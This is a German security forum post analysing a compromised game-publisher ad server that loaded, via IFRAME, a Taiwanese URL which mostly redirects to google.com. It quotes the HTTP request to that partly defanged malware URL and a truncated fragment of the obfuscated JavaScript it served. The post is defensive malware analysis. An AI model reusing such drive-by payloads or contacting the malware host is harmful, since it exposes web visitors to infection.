Zurück   Trojaner-Board > Malware entfernen > Diskussionsforum
MalwareSite, die auf Google.com weiterleitet...

MalwareSite, die auf Google.com weiterleitet...


Diskussionsforum: MalwareSite, die auf Google.com weiterleitet...

Windows 7 Hier sind ausschließlich fachspezifische Diskussionen erwünscht. Bitte keine Log-Files, Hilferufe oder ähnliches posten. Themen zum "Trojaner entfernen" oder "Malware Probleme" dürfen hier nur diskutiert werden. Bereinigungen von nicht ausgebildeten Usern sind hier untersagt. Wenn du dir einen Virus doer Trojaner eingefangen hast, eröffne ein Thema in den Bereinigungsforen oben.

 
Vorheriger Beitrag Vorheriger Beitrag   Nächster Beitrag Nächster Beitrag
Alt 27.03.2010, 15:15   #1
cookieray
 
MalwareSite, die auf Google.com weiterleitet... - Standard

MalwareSite, die auf Google.com weiterleitet...


Hintergrund ist folgender Vorfall:
>> hxxp://lastchaos-forum.gamigo.de/showthread.php?t=143773
(Diskussionspunkt ist der Analyse-Post auf der ersten Thread-Seite.)


im Telegrammstil:
Ein AdServer eines deustchen Online-Spiele-Publisher wurde offensichtlich kompromitiert und hat per IFRAME Code von einer Taiwanesischen Server-Adresse nachgeladen. Inzwischen wird der Code-Sample von Kaspersky als MalWare geführt (CodeSample wurde bei verschienden AntVir-Firmen zur Untersuchung hochgeladen):

hxxp://www.virustotal.com/de/analisis/5cd62c77e76e60ed311e01044ef12234637bde1703d8bba903b1000c02e1968a-1269693888

Zur Diskussion:

Code wird versucht von h**p://notydivi.com.tw/entropy/index.php abzurufen.
In den weitaus meisten Fällen wird aber einfach ein http-location Redirect an "www.google.com" rückgemeldet (ca. 30x). Erst nach weiteren Spielereien z.B. mit dem http "User Agent" wurde obskurer Code ausgeliefert.

Anbei ein geglückter Code-Abruf über websniffer.net (-xxx- zur Sicherheit im Text)
Zitat:
Connect to 95.143.192.-xxx-142 on port 80 ... ok

GET /entropy/index.php HTTP/1.0[CRLF]
Host: notydivi.com.-xxx-tw[CRLF]
Connection: close[CRLF]
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)[CRLF]
Accept-Encoding: gzip[CRLF]
Accept-Charset: ISO-8859-1,UTF-8;q=0.7,*;q=0.7[CRLF]
Cache-Control: no[CRLF]
Accept-Language: de,en;q=0.7,en-us;q=0.3[CRLF]
Referer: hxxp://web-sniffer.net/[CRLF]
[CRLF]

HTTP Response Header
Name Value Delim
Status: HTTP/1.1 200 OK
Date: Mon, 22 Mar 2010 22:02:04 GMT
Server: Apache
X-Powered-By: PHP/5.2.12
Pragma: no-cache
Cache-Control: no-cache, must-revalidate
Content-Encoding: gzip
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content (encoded: 9.46 KiB / decoded: 15.13 KiB)

<body><p>42</p><script></script><script>kryue="0F191_1d1e2Z2[1b2_1`3+3K1H1W1Z3-1X2S2X1S1T2R2f1Q3P1O2U1M2g1K321I373E1D1E2Q3,1@1A2J 271>3Y1<3f1:333Q0W10152^133_113V3Z1.2c1

[.....]

document.body.appendChild(hvcqy);</script></body>



Hat jemand Erfahrung, nach welchen Kritierien solche Malware-Server Code ausliefern? Scheinbar erfolgt das "intelligent" - einmal Malware ausgeliefert, bekomme ich nur noch(?) Weiterleitungen auf "google.com"...


Hinweis zur Klarstellung: Der betroffene Publisher spricht von einem AdScript-Fehler und übersensiblen Virenscanner - es hätte keine Gefahr bestanden. Deshalb sollte meine Aussage hier auch kritisch betrachten.

 

Themen zu MalwareSite, die auf Google.com weiterleitet...
agent, code, connect, einfach, encoded, erfahrung, folge, folgender, gamigo last chaos bot adserver, gefahr, hintergrund, kaspersky, malware, port, port 80, redirect, scan, scanner, schei, script, sicherheit, untersuchung, user agent, value, versucht, virenscan, virenscanner, weiterleitungen, windows, zwischen


« Will lernen nur wie | TR/Agent.ruo »


Ähnliche Themen: MalwareSite, die auf Google.com weiterleitet...


  1. Google App Engine: Google reagiert träge auf Java-Sicherheitslücken
    Nachrichten - 18.05.2015 (0)
  2. Win 7: Google Chrome/Mozilla firefox lässt vermehrt Werbung auf Webseiten zu & Google Suchergebnisse scheinen manipuliert zu sein
    Log-Analyse und Auswertung - 29.04.2014 (8)
  3. Google Redirect - Malware - Google leitet falsch um
    Plagegeister aller Art und deren Bekämpfung - 26.12.2012 (21)
  4. google leitet mich auf falsche Seiten um (google redirect?)
    Log-Analyse und Auswertung - 14.08.2012 (20)
  5. Google Redirect Virus bzw. Google Hijack + PC Langsam
    Plagegeister aller Art und deren Bekämpfung - 10.07.2012 (2)
  6. Google leitet mich immer auf andere Websites( manchmal sogar auf google selbst)
    Plagegeister aller Art und deren Bekämpfung - 29.03.2012 (21)
  7. Google Chrome leitet Trojaner-Board Treffer bei Google auf dollarade.com um!
    Diskussionsforum - 07.02.2012 (18)
  8. Erst verfälschte Aufrufe aus Google-Trefferliste, jetzt kein Verbindungsaufbau mit Google möglich
    Plagegeister aller Art und deren Bekämpfung - 11.11.2011 (18)
  9. Virus der google anfragen auf unbekannte webseiten weiterleitet
    Plagegeister aller Art und deren Bekämpfung - 19.07.2011 (18)
  10. Google-Umleitung und eingeschränkte Google-Suche
    Plagegeister aller Art und deren Bekämpfung - 14.06.2011 (7)
  11. Google Suchwort-Links, springen wieder zur Google Startseite
    Log-Analyse und Auswertung - 12.06.2011 (10)
  12. Weiterleitung zu Epoclick, Gomeo, google analytics, google websites, google anderer länder
    Plagegeister aller Art und deren Bekämpfung - 10.05.2011 (6)
  13. Browser öffnet Google Seiten oder Werbung, Google Suche funktioniert nicht
    Plagegeister aller Art und deren Bekämpfung - 20.01.2011 (26)
  14. ,,Google Virus" Problem bei google suche und PC extrem langsam
    Log-Analyse und Auswertung - 20.10.2010 (17)
  15. Google links führen immer zu google
    Log-Analyse und Auswertung - 09.05.2010 (1)
  16. Einige Google Suchergebnisse verweisen auf die URL http://go.google.com/ ....
    Mülltonne - 23.12.2008 (2)
  17. Ich werde immer von google umgeleitet auf abcjump oder go.google usw.
    Mülltonne - 27.11.2008 (0)
Anleitungen und Tipps

- Für alle Hilfesuchenden! Was beachten?

- Anleitung: MyStartSearch.com entfernen

- Anleitung: WebSearches löschen

- Hilfe: iStartSurf entfernen – so gehts!

- Anleitung: Omiga Plus richtig entfernen

- Browser Viren entfernen


Zum Thema MalwareSite, die auf Google.com weiterleitet... - Hintergrund ist folgender Vorfall: >> hxxp://lastchaos-forum.gamigo.de/showthread.php?t=143773 (Diskussionspunkt ist der Analyse-Post auf der ersten Thread-Seite.) im Telegrammstil: Ein AdServer eines deustchen Online-Spiele-Publisher wurde offensichtlich kompromitiert und hat per IFRAME Code von - MalwareSite, die auf Google.com weiterleitet......
Archiv
Du betrachtest: MalwareSite, die auf Google.com weiterleitet... auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131